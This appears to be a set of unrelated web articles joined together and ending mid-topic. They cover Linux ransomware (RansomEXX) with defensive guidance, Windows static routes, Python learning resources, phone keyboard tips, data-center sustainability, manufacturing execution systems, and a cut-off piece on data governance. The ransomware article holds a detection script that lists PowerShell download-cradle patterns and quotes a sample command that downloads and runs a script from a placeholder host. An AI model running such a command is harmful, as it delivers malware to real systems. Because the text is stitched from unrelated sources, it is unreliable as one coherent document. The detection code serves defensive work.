RansomEXX is a well-known ransomware variant that has expanded to target Linux systems. Over time, it has played a role in numerous high-profile attacks on government entities, the healthcare sector, and other enterprises. RansomEXX is written in C/C++ and then compiled for Linux. Initial access methods often include phishing or spear-phishing, exploiting vulnerabilities in remote desktop protocols, or using stolen credentials. Once inside the network, the ransomware operators escalate privileges and move laterally, eventually deploying the ransomware payload to encrypt the victim’s filesystem. RansomEXX uses the RSA-4096 and AES-256 algorithms for encryption, which makes decryption impossible without the private key. Advanced threat actors typically deploy RansomEXX in targeted attacks involving extensive reconnaissance and the exfiltration of sensitive data. The attacks commonly employ double extortion tactics.

Methods of Infection and Common Attack Vectors

Ransomware operators use various methods across different attack vectors to gain initial access to targeted systems:

Phishing and social engineering

Phishing and spear-phishing are common tactics for gaining initial access to systems. Attackers use social engineering to trick targeted individuals into clicking on malicious links or opening documents containing harmful code, which installs additional malware on the system. 
Once the ransomware executes, it encrypts the victim’s files and demands a ransom.

Figure 2-4. The screenshots below show cleverly crafted phishing pages designed to capture user credentials. Note the URL to see that these are phishing pages, not LinkedIn.

Exploiting unpatched or unknown (zero-day) vulnerabilities is another method to breach a system or network. These exploits can range from remote code execution (RCE) vulnerabilities to flaws in the Linux kernel. After gaining access, attackers deploy and execute ransomware to encrypt the filesystem.

Weak or compromised credentials

Attackers also exploit weak passwords and poor credential management to gain access to systems. Usernames and passwords not changed from default settings are particularly vulnerable. For example, the Cyberav3ngers APT group recently exploited default settings on Programmable Logic Controllers (PLCs) manufactured by Unitronics Vision to access devices used in industrial applications, such as water supply systems worldwide.

Supply chain attacks

Attackers may compromise a third-party vendor to gain access to target systems. One of the most well-known supply chain attacks was the SolarWinds breach, which compromised multiple U.S. government agencies. By targeting software packages, libraries, and software repositories used in Linux systems, attackers can acquire access to an environment without directly targeting the system itself.

Malicious scripts and executables

Malicious scripts are often delivered through compromised or malicious websites and email attachments. The scripts, commonly written in Bash, Python, and PowerShell, can download and execute ransomware payloads. A typical example is a script that uses the PowerShell Invoke-Expression (IEX) cmdlet to download malware from a malicious domain. The IEX cmdlet can create a Component Object Model (COM) object or a .NET web object to download and execute malware on a system. 
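On the defensive side, the download-cradle pattern just described can be hunted in process-creation or command-line logs. The heuristic below is a sketch, and the indicator patterns are illustrative rather than exhaustive:

```python
import re

# Strings often seen in PowerShell "download cradles" like the
# Invoke-Expression example described above.
SUSPICIOUS_PATTERNS = [
    re.compile(r"\bIEX\b|\bInvoke-Expression\b", re.IGNORECASE),
    re.compile(r"New-Object\s+(System\.)?Net\.WebClient", re.IGNORECASE),
    re.compile(r"DownloadString|DownloadFile", re.IGNORECASE),
]

def looks_like_download_cradle(command_line):
    """Return True when a logged command line matches two or more
    indicators, reducing false positives on benign admin activity."""
    matches = sum(1 for p in SUSPICIOUS_PATTERNS if p.search(command_line))
    return matches >= 2

benign = "powershell Get-ChildItem C:\\Users"
cradle = ("powershell -nop IEX (New-Object Net.WebClient)"
          ".DownloadString('http://example.invalid/p.ps1')")
print(looks_like_download_cradle(benign))  # False
print(looks_like_download_cradle(cradle))  # True
```

Real deployments would feed such rules into an EDR or SIEM instead of a standalone script, and attackers can evade simple string matching with obfuscation, which is why the article stresses layered controls.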
The user needs only to open or execute a document or link containing the embedded PowerShell code.

Figure 5. This example shows the combination of the Invoke-Expression cmdlet in PowerShell with a .NET web object to download and execute a payload from a malicious domain. Here is the GitHub Gist.

Best Practices for Ransomware Prevention and Response

Here are several best practices to prevent and mitigate ransomware attacks:

Regular backups, data recovery, and business continuity planning (BCP)

Implement strict backup procedures and store backups in a secure and isolated environment to ensure a quick recovery from an attack. These measures are often part of a Business Continuity Plan (BCP) designed to enable swift recovery from incidents that disrupt access to data. However, BCPs and backups do not protect against double extortion, where data might still get leaked even after restoring access.

Patch management and vulnerability scanning

Systems should be continuously updated and patched to address vulnerabilities. Organizations should conduct regular vulnerability scans and promptly remediate any identified vulnerabilities. Automated patch management tools can streamline and enhance the efficiency of this process.

Strong authentication and access controls

Implementing authentication mechanisms, including multi-factor authentication (MFA), is critical for preventing unauthorized access. Organizations should require unique and complex passwords and regularly audit user privileges to ensure that only authorized individuals can access critical systems and data. Organizations should configure SSH with key pairs for remote access to Linux systems.

Network segmentation and firewalls

Segmenting networks can limit the spread of malware in the event of an infection. Organizations should use firewalls and intrusion detection/prevention systems (IDS/IPS) to monitor and control communication between network segments. 
Additionally, organizations can implement privileged access workstations (PAWs) to separate systems into categories such as administrative, data (servers), and workstations. A PAW ensures that administrative tasks requiring elevated privileges are performed only on isolated machines.

Application whitelisting and execution control

Application whitelisting (or allowlisting) allows only pre-approved, trusted applications to run on a system, preventing the execution of unauthorized or malicious software, including ransomware. Organizations can combine application whitelisting with execution control mechanisms such as SELinux or AppArmor to enforce security policies and restrict what processes can do.

Things to know about application whitelisting and execution control:

- Security control: Proactively mitigates the risk of ransomware execution.
- Implementation: Tools like AppArmor, SELinux, and fs-verity can enforce application whitelisting in Linux environments.
- Flexibility: Whitelists can be customized to the needs of administrators and the system.
- Challenges: Application whitelisting requires regular maintenance to keep the list up to date.

Security awareness training

Employees should receive regular training on the dangers of phishing and social engineering. Security awareness training helps users recognize and avoid potential threats, reducing the likelihood of successful attacks. Organizations should encourage users to report potential phishing and spam, and should establish clear procedures for responding to security incidents.

Incident response planning

Incident response plans should cover people, processes, and technology. The U.S. National Institute of Standards and Technology (NIST) publishes an incident response guide that is a good starting point. Best practices include creating playbooks that detail roles, responsibilities, and steps to take during a breach.
Organizations should conduct tabletop exercises and drills to test the incident response plan and prepare team members for real-life incidents.

Monitoring and threat intelligence

Continuous monitoring of your Linux systems is essential for detecting malicious activity and ransomware, and a security information and event management (SIEM) tool is well suited to the task. Security personnel can collect and analyze logs in real time to detect anomalous activity, set up alerts and analytics rules for known indicators of compromise, configure automated responses, and proactively hunt for threats using a query language. Use playbooks for consistent incident handling, and ensure your SIEM integrates threat intelligence sources so you stay updated on the latest tactics of threat actors and ransomware operators.

Additional Resources and Links

Privileged Access Workstations: https://uit.stanford.edu/service/paw
NIST Incident Response Guidelines: https://nvlpubs.nist.gov/nistpubs/specialpublications/nist.sp.800-61r2.pdf
Malware samples and resources
ITPro Today Linux resources

This article references open-source code repositories and Gists available on GitHub. Please note the following disclaimer by the author: the code provided is helpful for red teaming and security operations. Any actions you take using this code are entirely your responsibility. The code is intended for use by security professionals involved in professional red-team engagements and security research. The code is free and open source.
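The kind of log analysis a SIEM automates can be approximated with a few lines of scripting. This illustrative sketch (the log lines are invented, but they follow the common sshd message format) counts failed SSH password attempts per source IP, a simple indicator worth alerting on:

```python
import re
from collections import Counter

# Sample auth-log lines in the common sshd format (invented for illustration).
log_lines = [
    "Sep 20 10:01:02 host sshd[811]: Failed password for root from 203.0.113.9 port 52211 ssh2",
    "Sep 20 10:01:05 host sshd[811]: Failed password for root from 203.0.113.9 port 52212 ssh2",
    "Sep 20 10:02:11 host sshd[812]: Accepted publickey for deploy from 198.51.100.4 port 40022 ssh2",
    "Sep 20 10:03:40 host sshd[813]: Failed password for invalid user admin from 203.0.113.9 port 52213 ssh2",
]

FAILED = re.compile(r"Failed password for .* from (\d+\.\d+\.\d+\.\d+)")

def failed_logins_by_ip(lines):
    """Count failed SSH password attempts per source IP address."""
    return Counter(m.group(1) for line in lines if (m := FAILED.search(line)))

counts = failed_logins_by_ip(log_lines)
for ip, n in counts.items():
    if n >= 3:  # a trivial alert threshold; real SIEM analytics rules are richer
        print(f"ALERT: {n} failed SSH logins from {ip}")
```

A production SIEM would of course ingest logs continuously and correlate across hosts; this only shows the shape of one detection rule.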
Source: https://www.itprotoday.com/linux-os/linux-ransomware-threats-how-attackers-target-linux-systems
What is a Routing Table

A routing table determines where packets go after leaving a system (PC, server, router, switch, firewall, and so on). The routing table in Windows does the same job: it determines the best path on which to send packets received from another source.

In a large environment with multiple networks, it is common practice to add routes for different networks, or sometimes for specific IP addresses. The decisions are always based on the requirements at hand.

Here is a simple example. Suppose a PC has two network interfaces connected to different networks. Because we cannot assign a different gateway to each interface, we leave one interface without a gateway. We can then route the packets from the interface without a gateway through the gateway we want, so that each time we use the network assigned to that interface, Windows knows where to send the packets.

How to view the routing table

Before changing the routing table or troubleshooting network issues, you should view the routing table that already exists. As a best practice, keep a note of the routing table before making any change. Type the following command to view it:

route print

You will see a long list of network destinations and gateways. Unless you have added static routes, all entries are created dynamically by Windows. The output has three sections:

- IPv4 Route Table: all the IPv4 routes built dynamically by Windows.
- Persistent Routes: all the static routes created by IT admins.
- IPv6 Route Table: all the IPv6 routes built dynamically by Windows.

How to add a static route

To add a static route to the routing table, type the following command.
route add destination_network MASK subnet_mask gateway_ip_address metric

Let's explain the parameters one by one:

- destination_network: the destination network subnet that will receive the traffic.
- subnet_mask: the subnet mask of the destination network.
- gateway_ip_address: the gateway that will pass the traffic.
- metric: a value the routing table uses to make a routing decision, based on link speed, number of hops, and time delay. It is optional.

A static route added this way exists only until the next restart of the PC or server.

How to add a persistent route

If we want to make the route permanent, we add the -p option, as in this example:

route add -p destination_network MASK subnet_mask gateway_ip_address metric

This option keeps the route in the Persistent Routes section of the routing table, so it is not deleted after a restart.

Let's walk through a very simple scenario. We have one laptop with a wired connection to a local network and a Wi-Fi connection. We want to send the traffic for our local network (domain controller, file server, and so on) over the wired connection, but connect to the Internet only over Wi-Fi. The networks are:

- 172.16.3.0/24 for the local network
- 192.168.137.0 for the Wi-Fi connection

We type the following command to route the local network traffic over the wired connection:

route add -p 172.0.0.0 MASK 255.0.0.0 172.16.3.254

Because we have multiple VLANs in our network, this says that any traffic destined for the 172.0.0.0 subnet (which includes all the subnets that start with 172) is routed to the gateway 172.16.3.254, the gateway of the wired connection.

Now let's create the route for the Wi-Fi:

route add -p 0.0.0.0 MASK 0.0.0.0 192.168.137.254

Let's explain the above command.
This command routes all traffic that does not match the 172.0.0.0 network with mask 255.0.0.0 to the gateway of the Wi-Fi adapter.

Let's take a look at the routing table to verify the routes. Type route print and check the Persistent Routes section; you should see the new routes.

After creating and verifying the routes, verify that everything works as expected. Type the following command, and monitor the real-time connections of your machine. Then open a web page and check where the requests are sent from. Also open a Remote Desktop connection to an internal server and check where those requests are sent from. If everything works as expected, the requests to the web page should be sent from 192.168.137.x, and the Remote Desktop requests should be sent from 172.16.3.x.

How to delete a static or persistent route

To delete a route we have created, we replace route add with route delete. For example:

route delete 0.0.0.0 MASK 0.0.0.0 192.168.137.254

The route command itself is very simple. The important part is understanding the traffic flow and what you want to achieve. I hope you find this article valuable. See you next week.
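The decision Windows makes with these routes can be illustrated with Python's standard ipaddress module. This sketch (the routes mirror the example above) picks the most specific matching route for a destination, which is why 172.x traffic goes out the wired gateway while everything else falls through to the Wi-Fi default route:

```python
import ipaddress

# The two persistent routes from the example: destination network -> gateway.
routes = [
    (ipaddress.ip_network("172.0.0.0/8"), "172.16.3.254"),   # wired LAN route
    (ipaddress.ip_network("0.0.0.0/0"), "192.168.137.254"),  # Wi-Fi default route
]

def pick_gateway(destination):
    """Return the gateway of the most specific (longest-prefix) matching route."""
    candidates = [(net, gw) for net, gw in routes
                  if ipaddress.ip_address(destination) in net]
    # Longest prefix wins, just as in a real routing table lookup.
    net, gw = max(candidates, key=lambda pair: pair[0].prefixlen)
    return gw

print(pick_gateway("172.16.3.10"))  # 172.16.3.254 (matches 172.0.0.0/8)
print(pick_gateway("8.8.8.8"))      # 192.168.137.254 (only the default matches)
```

This is only a model of the lookup; the real Windows stack also weighs the metric when prefixes tie.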
Source: https://askme4tech.com/how-add-static-or-persistent-route-windows
Coding in Python is not hard; in fact, it has long been acclaimed as one of the easiest programming languages to learn. It is a good starting point if you're looking to get into web development, or even game development, as there are many resources for building games with Python, and that is one of the quickest ways to learn the language. Many programmers have used Python as the beginning of their journey, later picking up languages like PHP and Ruby. It's also one of the hottest web programming languages in 2014, and highly recommended to learn.

But how do you learn Python? Where do you begin? I'm here to solve that problem for you, as I've relied on many of these resources myself to learn programming and begin development. A friendly tip and word of advice: the best way to learn is by doing, and these books and resources are here only to guide you in the right direction.

Learn Python the Hard Way

The absolute easiest way of learning Python is by completing this book. You'll be amazed at how easy it is to pick up the basics, and you get a real sense of progress as you acquire new knowledge and move forward. I also found it very encouraging to try to create your own programs. Those programs might be small, but they'll definitely help you better understand the language and how the syntax works. The book is highly popular, so if you ever get stuck, it's likely that several answers are already available on sites like Stack Exchange; just do a Google search when you need a solution or help.

You'll learn how to:

- Set up a Python programming environment on all platforms
- Write Python programs
- Understand Python syntax and documentation
- Think like a programmer
- and a lot more!

The HTML online version is completely free, and it's also what most people use. I do encourage you to donate or purchase the full book, as the author has put a lot of effort into making it happen, and the premium version also includes videos, if you find learning from videos a lot easier.
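As the book encourages, even a tiny self-written program teaches a lot about syntax. A first exercise might look something like this (the names here are just illustrative, not from the book):

```python
# A small first program: a function, a loop, and string formatting.
def greet(name):
    """Return a greeting for the given name."""
    return f"Hello, {name}!"

names = ["Ada", "Guido", "you"]
for name in names:
    print(greet(name))

# Basic arithmetic, the kind of thing early exercises drill.
total = sum(range(1, 11))  # 1 + 2 + ... + 10
print("Sum of 1..10 is", total)  # prints 55
```

Typing programs like this out by hand, rather than copy-pasting, is exactly the habit these beginner resources try to build.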
The Python Challenge

It might be a little tricky to get going with this one if you've never programmed before, but it goes well together with the book above, and you should definitely give it a try. There are 33 levels (puzzles) that can be solved with your Python programming skills. Millions of people have attempted them, and even if you're unable to complete all of the levels, you'll have learned quite a few new things, especially in the field of critical and sharp thinking. Your brain is going to overheat, but that's programming!

Codecademy

You'll find that many 'elite' programmers dismiss this interactive platform, but that's not the point. What we want is to see and test how the basic syntax of a programming language works, and what can be done when it's combined with functions, beyond the usual 'Hello World!'. In this Codecademy course you will learn how to work with files, how loops work and how to use them, and what functions are and what they're good for. It's all very basic and very beginner friendly. Community forums are available for those who need help, but usually everything can be understood from within the dashboard you're working in. You won't need to install any tools; the only thing you might want is a Notepad++ editor, to rewrite the code on your own computer for a better understanding of it. That's what I do, and I recommend it to everyone who wants to learn programming, be it Python or any other language.

Udacity

Udacity offers a great course, free of charge, that introduces you to the Python programming language and teaches you about search engines and how to build your own little web crawler. It certainly is a fun course to take, and it offers extensive guides and community support to help you along the way.
You can enroll as a premium student to receive guidance from the instructors and earn a certificate by the end of the course, or you can start the free courseware right away. Unfortunately, the premium full course is at limited capacity, so you have to sign up for a waiting list. In total, there are 11 classes, all of which are thoroughly explained and documented. Go to the official page to learn more and find answers to any questions you might have.

Google's Python Class

Google itself is powered by a lot of Python code, so it only makes sense that the company supports the community and wants to help others learn the language. This is one of my favorite guides and classes I've ever viewed; it's really detailed, and the videos are very beginner friendly and entertaining to watch. Just watch a couple of minutes of the first lecture to get a better sense of whether you like the instructor, and then perhaps start learning! The official Python Class page has all of the links to exercises and examples.

Very similar to LPTHW, but this one offers a slightly more in-depth introduction on how to get your perfect setup up and running, and how to take the first steps so you don't overwhelm yourself. It has been recognized as one of the best beginner guides for those who want to learn Python. Definitely check it out and read the first few chapters to figure out whether you like the style of writing.

Think Python

Think Python is an introduction to Python programming for beginners. It starts with basic concepts of programming and is carefully designed to define all terms when they are first used and to develop each new concept in a logical progression. Larger topics, like recursion and object-oriented programming, are divided into sequences of smaller steps and introduced over the course of several chapters. You can find a lot of the example code by following this link; it's one of the most professional books and has a strict "teaching you computer science" policy.
It costs nearly $40 to purchase, but you can download the PDF and HTML versions for free. I'd definitely take advantage of that if I were learning Python from the beginning.

Learnstreet

You'd think that a site offering programming courses would know how to add an HTML title to its pages! In all seriousness, though, Learnstreet offers a great interactive course for learning Python. It's as beginner friendly as everything in this post, and if you ever run into problems, it's best to Google them. What I like about Learnstreet is the amount of hints and explanation you get with each exercise, right within the same dashboard you write your code in.

The New Boston

If you're someone who likes to learn from video tutorials, I'm not sure there is anything as comprehensive as The New Boston video tutorial series for learning Python, and many other programming languages, as can be seen on their YouTube channel. The only downside is that there is no real material to read or download; it all comes in video format. I'm the type of programmer who can't stand having to watch videos all the time, though that might clash with my opinion of Google's Python class, which was pretty sweet.

This course is intended for people who have never programmed before. A knowledge of grade-school mathematics is necessary: you need to be comfortable with simple mathematical equations, including operator precedence, and with simple functions such as f(x) = x + 5. It should be completed within ten weeks, spending around ten hours on the tasks each week. If you can find the time to do it without overwhelming yourself, I do recommend signing up and completing this course; it will only strengthen your knowledge, and it can be combined with any of the above resources for better understanding.
Where to Learn Python?

It turns out that I've tried most of these courses myself. I was actually hoping there would be more resources and links to add to the list, but we've just looked at all of the major ones, and there is so much new material you're going to be learning from them.

What is your experience with programming, and what are you looking to do with your newly found skills? I think anyone who wants to build their expertise should first decide what they want to build, and then work on that project until it gets done. The beauty of doing that is that you'll learn specific things, and recreating similar projects will be much easier. Interactive platforms are cool, but they're not yet ready to replace books or courses provided and narrated by professionals.

I wish you the best of luck with learning Python, and if you've got any questions to ask, please do so in the comment box.
Source: https://www.lufsec.com/10-resources-to-learn-python-programming-language/
Cut and paste, use speech-to-text, and access keyboard settings.

INSTRUCTIONS & INFO

- To access the keyboard, tap on a text entry field.
- Tap the Shift arrow key to capitalize the next letter entered. To enable Caps Lock, touch and hold the Shift arrow key.
- Tap the 1# icon to access symbols and numbers. Tap the arrow keys to view more symbols. Tap the ABC key to return to the alphabet.
- Touch and hold a character key to access a list of characters associated with that key.
- The suggestion bar will suggest alternate spellings of the last entered word, if applicable. Tap a suggestion to replace the word in the text field. Note: Swiping up from under a suggested word will also replace the word with the word from the suggestion bar.
- To move the cursor, touch and drag across the space bar.
- To use speech-to-text, tap the Microphone icon, then speak.
- To delete text, tap the Backspace key.
- To access emoticons, tap the Emoticon key. From the emoticons screen, tap the desired emoticon.
- To use Swype, touch and drag across each letter of the desired word without lifting your finger from the screen.
- To copy and paste text, tap and hold the desired text. Touch and drag the text selection handles to highlight all the desired text, then tap the Copy icon. In the desired pasting location, tap and hold the text field to place the cursor, then tap the PASTE icon.
- To access keyboard settings, tap and hold the Microphone icon, then tap the Settings icon.
- To customize the keyboard layout, tap Yes, then tap and drag the blue bar on the keyboard to resize. When you're satisfied with the keyboard layout, tap Done.
Source: https://www.att.com/device-support/article/wireless/KM1298433/LG/G4H810
Sustainability in Data Centers: What Makes a Data Center Sustainable?

Sustainability has become a key consideration in data center design as more organizations adopt environmental, social, and governance (ESG) principles. Traditional data centers raise environmental concerns due to significant power and water consumption. Sustainable data centers use less of these resources, reducing both environmental impact and operational costs. What is a sustainable data center? Here's a look at some of the terms, concepts, and strategies.

Data Center Sustainability Concepts

The overarching objective of data center sustainability is to minimize the facility's environmental footprint. Several core concepts fall under that umbrella.

ESG is a framework for assessing an organization's operations in terms of ethical impact. From the organization's perspective, it involves a strategy for maximizing environmental sustainability, fair treatment of workers, community engagement, ethical business practices, and risk management. Investors increasingly use ESG factors to evaluate corporate performance.

Power usage effectiveness (PUE) measures how much energy is used by computing equipment versus cooling and other overhead. Created by The Green Grid, PUE is calculated by dividing the total energy a data center consumes by the amount used by the computing equipment alone. If the two numbers are equal, meaning all energy goes to computing equipment, the ratio is 1.0.

Also called greenhouse gas (GHG) accounting, carbon accounting measures the amount of GHG an organization produces in the course of its business activities. Direct emissions are those produced by sources the organization owns or controls, while indirect emissions are produced by resources the organization purchases.

Net zero simply means cutting GHG emissions as close to zero as possible.
It's not the same as carbon neutrality, which involves offsetting carbon emissions and limiting future increases; net zero emphasizes actual reductions in carbon emissions and uses offsets only as a last resort. As highlighted in our data center trends article, many organizations have set a goal of net zero emissions by 2050.

Data Center Sustainability Strategies

Data center operators apply these concepts using a number of sustainability strategies. It's important to note that some strategies have both benefits and drawbacks.

Cooling accounts for almost 40 percent of a data center's energy consumption. Aisle containment helps conserve energy by preventing the mixing of chilled and hot air, and effective airflow management helps ensure that cooling reaches the equipment. Larger data centers are using water cooling, which reduces carbon emissions but consumes vast amounts of water; recirculated water cooling uses less water than traditional evaporative techniques. Free cooling involves filtering and humidifying naturally cool outside air and using mechanical cooling only when the ambient air is too hot.

Monitor and Measure

It's impossible to track sustainability improvements without data. Smart PDUs and other devices enable operations teams to establish baselines for power usage, temperature, and other metrics. Ongoing monitoring will show the effects of techniques such as consolidating servers, replacing legacy equipment, and reorganizing the data center layout. Measuring temperature at multiple points throughout the data center can help identify ways to reduce the thermal load.

Consider Alternative Energy Sources

Data centers can become more sustainable by switching to renewable energy or, if possible, generating primary or backup power onsite using hydrogen fuel cells. Nuclear power may one day be an option: emerging small modular reactors can generate 300 megawatts of electricity or more.
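The PUE metric defined earlier is a simple ratio, so the baseline data gathered from smart PDUs can be turned into it directly. A minimal sketch, with invented monthly readings:

```python
def pue(total_facility_kwh, it_equipment_kwh):
    """Power usage effectiveness: total facility energy / IT equipment energy."""
    if it_equipment_kwh <= 0:
        raise ValueError("IT equipment energy must be positive")
    return total_facility_kwh / it_equipment_kwh

# Hypothetical month: 1,500 MWh consumed in total, 1,000 MWh by IT equipment.
ratio = pue(1_500_000, 1_000_000)
print(f"PUE = {ratio:.2f}")  # PUE = 1.50: half a kWh of overhead per kWh of IT load
```

A ratio of 1.0 would mean every kilowatt-hour goes to computing; tracking this number month over month shows whether cooling and other overhead changes are paying off.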
Utilize Edge Computing

Edge computing offers many performance benefits for enterprise networks, such as reduced latency and bandwidth use, but it can also help with sustainability initiatives. By reducing dependence on a centralized data center, edge computing can lower cooling requirements and the associated energy expenditure. That's just one example; we share more about edge computing and sustainability in another article.

How Enconnex Is Addressing Data Center Sustainability

At Enconnex, we take sustainability seriously. As an ISO 14001:2015-certified company, we've incorporated an environmental management system designed to minimize our carbon footprint into our day-to-day operations. Additionally, we offer an array of products designed to help data centers meet their sustainability objectives. For example, our new InfiniRack data center cabinet is designed to manage airflow efficiently, minimizing energy wasted on inefficient cooling. Contact one of our data center experts to discuss your needs and goals.

Posted by Dave Bercovich on August 18, 2023

Dave has 20 years of data center and IT infrastructure sales experience. He has represented manufacturing organizations such as Avaya, Server Technology, and The Siemon Company. As Sales Director with Enconnex, he builds relationships and grows the Enconnex business, working with partners and resellers.
Source: https://blog.enconnex.com/data-center-sustainability
Applications that track and document the transformation of raw materials through a production pipeline into finished products are known as manufacturing execution systems, or MES. These systems monitor and track the production lifecycle, while other applications handle other aspects of the product lifecycle. The production lifecycle is typically confined to shop floor operations, where manufacturing takes place.

In today's Industrial Internet of Things (IIoT) world, an MES integrates through IIoT with devices such as sensors, instruments, robots, machines, and other networked equipment. The main purpose of an MES is to enhance management and control for administrators and to leverage automation to optimize production. Beyond this, by supplying its data and analysis, an MES can integrate with several other systems at various levels, such as enterprise resource planning (ERP) software, used for top-level resource planning analysis, or supervisory control and data acquisition (SCADA) systems, used to manage industrial process controls and data in larger operations.

Manufacturing execution systems (MES) and enterprise resource planning (ERP) software are not alternatives to each other. Put simply, an ERP manages stocks, while an MES manages the pipeline from raw materials to manufactured goods. Three main points differentiate ERP systems from MES:

- Function: ERP and MES fill complementary but different roles within the manufacturing plant. ERP focuses on overall quantitative analysis and scheduling, while MES focuses on shop floor operations.
- Integration: Because their functional domains differ, ERP and MES integrate into the larger plant system differently. ERPs sit at the top level and draw their data from other application sources, like CRMs. MES integrates directly with the machines and devices used on the industrial line, or through IIoT.
- Timing of data capture is another difference.
MES operates in real time, collecting data directly from devices and machines, while ERPs perform periodic data analysis, drawing from multiple sources across the business to generate hourly, monthly, and quarterly reports and more.

More detailed distinctions between ERP and MES functionality include:

- ERP systems mostly address pre-production issues as well as post-production analysis, which may entail:
  - Product strategy
  - Reference product information
  - Production demand
  - Master data
  - Bills of materials (BOMs)
  - Standard operating procedures (SOPs)
  - Change orders
- By contrast, manufacturing execution systems must be able to anticipate, align, and adjust production and business parameters in real time. MES also manage the data generated during and just after production, such as:
  - Resource usage (labor, equipment, materials)
  - Order and work-in-progress (WIP) status
  - As-built genealogy and yields
  - Time events
  - Machine throughput

The complementary nature of MES and ERP functionality allows manufacturing companies to integrate these systems and reap numerous benefits:

- Increased overall equipment effectiveness (OEE)
- Reduced cycle times
- Reduced data entry
- Data consistency
- Leaner manufacturing
- More on-time delivery

Some confusion has developed around the Industrial Internet of Things (IIoT) and manufacturing execution systems. MES applications have been in use since the 1990s, and in the wave of modern industrial smart technology adoption, IIoT has become synonymous with industrial automation and Industry 4.0, spurring the notion that MES has been replaced.

To clarify: the Industrial Internet of Things (IIoT) and manufacturing execution systems (MES) work together to provide a complete picture of a manufacturer's floor operations. Data analysis is recognized as a fundamental requirement in modern manufacturing, delivering many business benefits; to perform tasks like root cause analysis, for instance, large quantities of data are needed.
IIoT gathers much of this data: contextual details from devices, sensors, machines, and controllers. The MES combines the data from IIoT with its own context, such as customer details, orders, products, recipes, and billing, to complete the total picture of operations within the walls of the factory. While both IIoT and MES collect data, the MES, in conjunction with team members, owns the domain of analysis and the determination of situational changes in the ongoing manufacturing process. In other words, installing an IIoT alone provides a communications backbone between and among devices, but not the analytical brain to compile the context.

IoT (Internet of Things) platforms layer multiple technologies that provision and manage connected devices on an IoT network. IoT platforms are somewhat associated with consumer products, like those found in smart homes. Operating in industrial settings, IIoT platforms function similarly to IoT platforms, but with more advanced features that serve the specific needs of an industry. For shipping and physical storage, this may come in the form of robots that move products around a warehouse. Industrial cases are highly complex, with thousands to millions of connected devices that require powerful, robust platforms to manage them effectively.

MES platforms can be imagined as a layer on top of IoT and IIoT platforms. This layer, while not a management layer, effectively extends the information analytics pipeline from the device on the shop floor up through business insight and decision-making applications. In advanced cases, decisions can be automatically relayed back to shop floor devices for corrective actions, changes in scheduling, anticipation of materials, and so on.
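To make the "MES adds context to IIoT data" idea concrete, here is a minimal sketch (the field names and records are invented for illustration) that enriches raw sensor readings with the order context an MES might hold:

```python
# Raw readings as an IIoT platform might deliver them: machine ID + measurements.
iiot_readings = [
    {"machine": "press-01", "temp_c": 74.2, "units_made": 120},
    {"machine": "press-02", "temp_c": 91.7, "units_made": 95},
]

# Context an MES holds: which order and product each machine is currently running.
mes_context = {
    "press-01": {"order": "SO-1001", "product": "bracket-A"},
    "press-02": {"order": "SO-1002", "product": "bracket-B"},
}

def contextualize(readings, context):
    """Join each raw IIoT reading with its MES order context."""
    return [{**r, **context.get(r["machine"], {})} for r in readings]

for record in contextualize(iiot_readings, mes_context):
    print(record)
# Each record now carries both the measurement and the order it belongs to,
# which is the "total picture" described above.
```

A real MES does this at scale against live device streams and ERP master data, but the principle is the same join of measurement and business context.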
Manufacturing execution systems (MES) and the Industrial Internet of Things (IIoT) are brought together under the popular umbrella term Industry 4.0. IIoT is essentially the foundation of all smart manufacturing. Acting as a backbone, IIoT makes it possible for sensors, devices, machines, robots, controllers, databases, and information systems to communicate with each other. Because of this, IIoT was once thought to replace MES as the device-facing system. MES has not been replaced; instead, it has embraced IIoT and now adds far greater value as a data context system.

MES integrates with IIoT to improve data analysis and root-cause analysis. IIoT collects data from sensors, devices, robots, controllers, and so on, and provides that data to the MES, which, possibly linked to other data systems like ERP, can add greater context to it. By analyzing device data alongside details on customers, orders, bills of materials, and more, a complete and useful picture of the data can be created. This context is important in a manufacturing environment where orders, materials, schedules, and more can change rapidly.

Manufacturing teams also rely on MES to make sense of and error-proof data through rules enforcement. If a specific quantity of material is to be used, only that amount is allotted; the same goes for equipment, the types of tasks, and the order in which they are performed. While the IIoT collects data on these processes, the manufacturing execution system ensures their accuracy.

Manufacturing execution systems are complex applications that help manufacturers improve visibility into their operations and enhance their ability to control and manage them. Several other key and incidental benefits stem from these systems.

- Improved Management And Control: MES enhances visibility into the entire production lifecycle while adding controls and analysis, ultimately improving quality.
- Automated Regulatory Compliance: Compliance is complex to maintain.
Leveraging compute and automation functions at the point of work, namely the plant floor, and integrating into larger company systems, such as enterprise resource planning (ERP) platforms, offloads that work from humans to machines, making data organization easier. Organized data means compliance becomes manageable and turns from a burden into a strength.
- Fast And Accurate Reporting — High-level leadership, concerned with business-level issues, needs a different analysis than those in operations, who need details of the factory line. MES systems are able to analyze data for digestion at multiple levels, feeding the right information to the right users.
- Increased Visibility And Efficiency — MES platforms provide centralized dashboards with relevant real-time information about factory floor operations. Operational visibility reveals inefficiencies, such as bottlenecks, and identifies incidents as they happen.
- Reduced System Costs — From operational visibility stems cost transparency, where direct intervention can have a positive impact on the bottom line.
- Improved MES Supply Chain Collaboration — Integrating MES into in-line supply chain information systems enables data sharing that can contribute to greater supply chain efficiencies. Further, as value chain and supply chain entities grow in cooperation, greater value can be passed down to customers.

The core features found in manufacturing execution systems (MES) software help companies improve the quality and productivity of their production lines. MES core areas include resource allocation, shop floor management, production scheduling, production monitoring, and data collection and analysis. Within these areas, MES systems must be able to perform the following functions.
- Build schedules and execute production plans
- Effectively allocate human and material resources
- Provide information about plans and task details to shop floor workers during production
- Visualize shop floor layout, workstations, and equipment
- Visually monitor in real time the movements of materials and personnel on the shop floor
- Track equipment performance through SCADA system integrations
- Assist in identifying potential production bottlenecks and issues
- Present reports, dashboards, and analytics, and track output, utilization, and performance

Software related to MES includes:
- ERP Systems
- CAD & PLM Software
- Quality Management Systems (QMS)
- Asset Management Software
- Supply Chain Management Software (SCM)
Data governance is essential in today's fast-paced, highly competitive organizational world. With the ability to acquire large volumes of heterogeneous internal and external data, companies require a discipline to maximize value, manage human risks and errors, and cut costs. Data governance guarantees that data is consistent, trustworthy, and not misused. As companies face new data privacy regulations, it is also important to have data analytics in place; data analytics can help businesses optimize their operations and make better business decisions.

A well-designed data governance program usually includes a governance team, a steering committee that acts as the governing body, and a group of data stewards. They collaborate to develop data governance standards and policies, as well as implementation and enforcement methods that the data stewards generally carry out.

Why is data governance important?

